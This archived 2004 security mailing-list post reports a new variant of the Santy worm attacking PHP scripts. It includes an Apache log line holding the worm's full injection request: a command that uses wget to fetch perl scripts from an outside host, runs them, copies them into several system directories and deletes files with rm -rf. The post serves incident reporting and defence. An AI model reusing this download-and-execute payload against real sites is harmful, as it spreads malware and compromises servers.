[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.61.0412261537490.13642@catbert.rellim.com>
Date: Sun, 26 Dec 2004 15:50:18 -0800 (PST)
From: "Gary E. Miller" <gem@...lim.com>
To: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: New Santy-Worm attacks *all* PHP-skripts
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Yo All!
> It parses their URLs and overwrites variables with strings like:
>
> 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
> www.visualcoders.net/spybot.txt;...
Looks like www.visualcoders.net is now parked at Godaddy.
So the virus has mutated a bit. Since 2am PST 26 Dec I am seeing
a slightly different attack. The attack tries to download from:
http://midomain.false.ca. false.ca is no in the .ca zone right now.
Here is what one of the new attacks looks like in my apache logs:
ev1s-64-246-11-25.ev1servers.net cms.psychologytoday.com - [26/Dec/2004:02:17:12-0800] "GET /nmha/email_prof.php?profid=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f088955539
7a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f088!
9555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f
0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;p!
erl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f08895553
97a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.0" 200 37741 "-" "LWP::Simple/5.53"
I have seen 2700 attacks in just over 48 hours now. 336 of the new variant in
the last 14 hours.
RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
gem@...lim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
iD8DBQFBz04+8KZibdeR3qURAgxqAJ0XdDSXmiosy1GbhA6AmqRd/HbVegCeIpW2
l0DYPCOB3zSvtgr6nizHyEM=
=HQ2D
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists